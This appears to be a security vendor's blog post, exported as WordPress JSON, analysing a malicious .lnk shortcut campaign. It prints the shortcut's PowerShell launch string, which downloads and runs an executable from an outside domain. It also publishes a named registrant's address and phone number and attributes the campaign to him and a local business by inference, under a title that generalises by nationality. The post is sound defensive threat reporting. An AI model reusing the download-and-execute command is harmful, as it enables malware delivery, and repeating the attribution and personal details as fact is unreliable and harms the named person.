{"id":2665,"date":"2024-09-25T19:18:24","date_gmt":"2024-09-25T19:18:24","guid":{"rendered":"https:\/\/xdr-mdr.lmntrix.com\/main_web\/?p=2665"},"modified":"2025-07-29T06:01:47","modified_gmt":"2025-07-29T06:01:47","slug":"nefarious-nigerians-pedalling-powershell-pwnage","status":"publish","type":"post","link":"https:\/\/lmntrix.com\/blog\/nefarious-nigerians-pedalling-powershell-pwnage\/","title":{"rendered":"Nefarious Nigerians Pedalling PowerShell Pwnage"},"content":{"rendered":"<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-full is-resized\"><img fetchpriority=\"high\" decoding=\"async\" width=\"315\" height=\"318\" src=\"https:\/\/lmntrix.com\/blog\/wp-content\/uploads\/2024\/09\/3578190769_581bf72445_z.webp\" alt=\"100% Risk Free\" class=\"wp-image-2673\" style=\"width:571px;height:auto\" srcset=\"https:\/\/lmntrix.com\/blog\/wp-content\/uploads\/2024\/09\/3578190769_581bf72445_z.webp 315w, https:\/\/lmntrix.com\/blog\/wp-content\/uploads\/2024\/09\/3578190769_581bf72445_z-150x150.webp 150w\" sizes=\"(max-width: 315px) 100vw, 315px\" \/><\/figure>\n<\/div>\n\n\n<p>It seems any technology designed to make lives easier for law-abiding citizens can be usurped and corrupted by hackers, and in this, PowerShell is no different. In its legitimate form, PowerShell helps systems administrators automate tasks across both local and remote Windows systems (among many other uses) and is widely considered to be the best choice for performing such tasks.<br><br>But PowerShell is also heavily abused by various threat actors for malicious purposes. Our researchers have identified one such campaign which leverages \u201c.lnk\u201d shortcut files with embedded PowerShell commands that download an executable, infecting the target machine for various malicious activities.<br><br>\u201c.lnk\u201d is the file extension Windows uses for shortcut files, which point to an executable. LNK stands for LiNK. 
Shortcut files provide a direct link to an executable file, so the user does not have to navigate manually to the executable. Over the years, Microsoft has released multiple patches for .lnk vulnerabilities, resolving a number of issues. Among other PowerShell version releases, PowerShell 4.0 has been included in each Microsoft release since 2013.<br><br>Of late, the security community has seen many versions of sophisticated PowerShell attack methodologies and toolkits \u2013 widely categorized as \u2018fileless malware\u2019. The sample we\u2019re about to analyse falls under this umbrella. So, without further ado\u2026<\/p>\n\n\n\n<figure class=\"wp-block-table\"><table><tbody><tr><td><strong>SHA256<\/strong><\/td><td><strong>1ebb8efa3acd10fac6ffb44d4958ea1ca9d2787b77d209d284bcfba7d9287f16<\/strong><\/td><\/tr><tr><td><strong>File Type<\/strong><\/td><td>Windows Shortcut \u201c.lnk\u201d<\/td><\/tr><tr><td><strong>Threat name<\/strong><\/td><td>Trojan.PowerShell.LNK.Gen.3<\/td><\/tr><\/tbody><\/table><\/figure>\n\n\n\n<p>Upon examining the malicious .lnk file\u2019s contents, our first observation was that a PowerShell backdoor had been embedded into the shortcut file as its launch command. 
The following artifacts were collected from the .lnk file:<\/p>\n\n\n\n<figure class=\"wp-block-table\"><table><tbody><tr><td><strong>WorkingDirectory<\/strong><\/td><td>C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe<\/td><\/tr><tr><td><strong>IconLocation<\/strong><\/td><td>C:\\Windows\\system32\\imageres.dll<\/td><\/tr><tr><td><strong>LaunchString<\/strong><\/td><td>[System.Diagnostics.Process]::Start(&#8216;(New-objeCt sYsTEM.Net.wEBCLiEnT).dOWnLOadFilE( http:\/\/condorseeds.com\/best.exe , $env:TMp\\best.exe ) ; StARt $eNV:tMP\\best.exe&#8217;)<\/td><\/tr><\/tbody><\/table><\/figure>\n\n\n\n<p>On visiting the URL contained in the PowerShell launch string above, multiple Windows PE files can be observed \u2013 files which are still active on the domain:<\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><img decoding=\"async\" width=\"377\" height=\"220\" src=\"https:\/\/lmntrix.com\/blog\/wp-content\/uploads\/2024\/09\/1-1-2.webp\" alt=\"\" class=\"wp-image-2668\"\/><\/figure>\n\n\n\n<p>The hosted Windows PE file (best.exe) was downloaded for further analysis. According to VirusTotal, the executable was identified as \u2018malicious\u2019 by a significant number of anti-virus vendors. Specifically, it was categorized as a \u2018Trojan Agent\u2019. 
This is a category AV vendors use to identify malware which enables a remote attacker to gain complete access to (or send commands to) a compromised computer:<\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><img decoding=\"async\" width=\"947\" height=\"559\" src=\"https:\/\/lmntrix.com\/blog\/wp-content\/uploads\/2024\/09\/2-1-2.webp\" alt=\"\" class=\"wp-image-2669\"\/><\/figure>\n\n\n\n<p>From static analysis of the sample, the following PE header information was seen; note that multiple PE sections contain 0 bytes of raw data:<\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"314\" height=\"264\" src=\"https:\/\/lmntrix.com\/blog\/wp-content\/uploads\/2024\/09\/3-1-2.webp\" alt=\"\" class=\"wp-image-2670\"\/><\/figure>\n\n\n\n<p>The PE header timestamp shows a very old compilation date of 1992:<br><br>&#8220;3d5f6991353499731ab8b5f6c7e57394c86397af6c1ada8a86d4a00cd8825c3d.exe.bin&#8221; claims program is from Mon Mar 16 21:26:25 1992<br><br>Next, we witnessed the executable make a further code branch decision directly after calling an environment-aware API. The API, \u2018GetVersion@KERNEL32(.)DLL\u2019, is followed by a CMP (compare) instruction on its result.<\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"316\" height=\"410\" src=\"https:\/\/lmntrix.com\/blog\/wp-content\/uploads\/2024\/09\/4-1-2.webp\" alt=\"\" class=\"wp-image-2671\"\/><\/figure>\n\n\n\n<p>The malicious file then made changes to the Windows kernel security device driver, ksecdd.sys (\\Device\\KsecDD), on the victim machine, which can corrupt the driver or run code under it. This can potentially lead to privilege escalation and integrity compromise.<br><br><strong>Threat Actor Details: <\/strong>The domain found earlier in the analysis, condorseeds[.]com, was recently registered. 
A search on WhoIs provided the following information:<br><br>Name: Michael Ogu (registrant, admin, tech)<br><br>Street: 10 Alaeni street Owerri (registrant, admin, tech)<br><br>City: Owerri (registrant, admin, tech)<br><br>Postal: 100001 (registrant, admin, tech)<br><br>Country: NIGERIA (registrant, admin, tech)<br><br>Phone: 2348037965994 (registrant, admin, tech)<br><br>Further investigation of the registrant\u2019s details and location seems to link the domain to a Nigerian dealer group based in Owerri known as \u2018OZB COMMUNICATIONS\u2019. Digging through their social media updates, we can see the group\u2019s services include hacking services for stolen smartphones, such as root access and IMEI manipulation:<\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"487\" height=\"300\" src=\"https:\/\/lmntrix.com\/blog\/wp-content\/uploads\/2024\/09\/5-1-2.webp\" alt=\"\" class=\"wp-image-2672\"\/><\/figure>\n\n\n\n<p>Taking these service offerings into account, it doesn\u2019t require a leap of faith to understand the malicious intent behind registering domains to host malware executables \u2013 either the group is selling access to other hackers or is orchestrating attacks itself. Despite this easily identifiable information, cybercriminals often face no repercussions due to a lack of proper international cooperation in cyber security investigations.<br><br><strong>Indicators of compromise:<\/strong><br><br>Condorseeds[.]com<br><br><strong>Malicious MD5 file hashes of the campaign<\/strong><br><br>1a3f91d1de16372c6650ccb1d67109d6 (.lnk)<br><br>356c42eb560b22d606eeddc834c915aa (.lnk)<br><br>c19ed2f057e3e21375e789bdd9ee9467 (Windows EXE)<br><br><strong>Conclusion: <\/strong>Most anti-virus vendors have updated their signature databases and now identify these files as malicious. 
For the love of all that is holy, keep your host AV updated with recent signature details.<\/p>\n","protected":false},"excerpt":{"rendered":"<p>It seems any technology designed to make lives easier for law-abiding citizens can be usurped and corrupted by hackers, and in this, PowerShell is no different. In its legitimate form, PowerShell helps systems administrators automate tasks across both local and remote Windows systems (among many other uses) and is widely considered to be the best [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":2673,"comment_status":"closed","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[21],"tags":[],"class_list":["post-2665","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-labs"],"_links":{"self":[{"href":"https:\/\/lmntrix.com\/blog\/wp-json\/wp\/v2\/posts\/2665","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/lmntrix.com\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/lmntrix.com\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/lmntrix.com\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/lmntrix.com\/blog\/wp-json\/wp\/v2\/comments?post=2665"}],"version-history":[{"count":5,"href":"https:\/\/lmntrix.com\/blog\/wp-json\/wp\/v2\/posts\/2665\/revisions"}],"predecessor-version":[{"id":4302,"href":"https:\/\/lmntrix.com\/blog\/wp-json\/wp\/v2\/posts\/2665\/revisions\/4302"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/lmntrix.com\/blog\/wp-json\/wp\/v2\/media\/2673"}],"wp:attachment":[{"href":"https:\/\/lmntrix.com\/blog\/wp-json\/wp\/v2\/media?parent=2665"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/lmntrix.com\/blog\/wp-json\/wp\/v2\/categories?post=2665"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/lmntrix.com\/blog\/wp-json\/wp\/v2\/tags?post=2665"}],"curies":[
{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}